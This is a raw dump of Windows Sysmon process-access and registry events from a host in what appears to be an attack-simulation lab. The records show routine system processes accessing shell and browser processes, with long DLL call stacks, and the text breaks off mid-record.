13:30:39.935{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013023Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:39.935{08A6967A-4753-6000-0E05-000000009A01}23363552C:\Windows\system32\sihost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+1a0fc|C:\Windows\System32\modernexecserver.dll+1a09f|C:\Windows\System32\modernexecserver.dll+198f6|C:\Windows\System32\modernexecserver.dll+2c9d4|C:\Windows\System32\modernexecserver.dll+35efd|C:\Windows\System32\modernexecserver.dll+4d3a1|C:\Windows\System32\modernexecserver.dll+4d2bf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013022Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:39.873{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013021Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:39.873{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013020Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:39.873{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013019Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:39.873{08A6967A-4298-6000-2F00-000000009A01}22523364C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bc62|c:\windows\system32\tileobjserver.dll+26db2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000013018Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:39.873{08A6967A-4298-6000-2F00-000000009A01}22523364C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\tileobjserver.dll+bc0f|c:\windows\system32\tileobjserver.dll+26db2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000013017Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:39.623{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f40ac|C:\Windows\System32\TwinUI.dll+f4bf7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000013016Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:39.607{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f40ac|C:\Windows\System32\TwinUI.dll+f4bf7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000013015Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:39.607{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013014Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:39.607{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013013Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:39.607{08A6967A-4754-6000-1705-000000009A01}34085144C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f88c6|C:\Windows\System32\TwinUI.dll+ed067|C:\Windows\System32\TwinUI.dll+f742e|C:\Windows\System32\TwinUI.dll+f73f9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013012Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:39.607{08A6967A-4754-6000-1705-000000009A01}34085144C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f88c6|C:\Windows\System32\TwinUI.dll+ed067|C:\Windows\System32\TwinUI.dll+f742e|C:\Windows\System32\TwinUI.dll+f73f9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013011Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:39.607{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000013040Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localInvDBSetValue2021-01-14 13:30:40.842{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKU\S-1-5-21-2738482597-1131698221-3520544381-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Internet Explorer\iexplore.exeBinary Data 12241200x800000000000000013039Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localInvDBDeleteValue2021-01-14 13:30:40.842{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKU\S-1-5-21-2738482597-1131698221-3520544381-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Internet Explorer\iexplore.exe 10341000x800000000000000013038Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:40.842{08A6967A-4288-6000-1400-000000009A01}12761404C:\Windows\System32\svchost.exe{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013037Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:40.842{08A6967A-4288-6000-1400-000000009A01}12761404C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013036Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:40.826{08A6967A-4753-6000-1105-000000009A01}45042676C:\Windows\system32\taskhostw.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013035Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:40.826{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013034Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:40.826{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013033Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:40.826{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013032Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:40.826{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013031Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:40.826{08A6967A-4750-6000-0205-000000009A01}47883780C:\Windows\system32\csrss.exe{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet 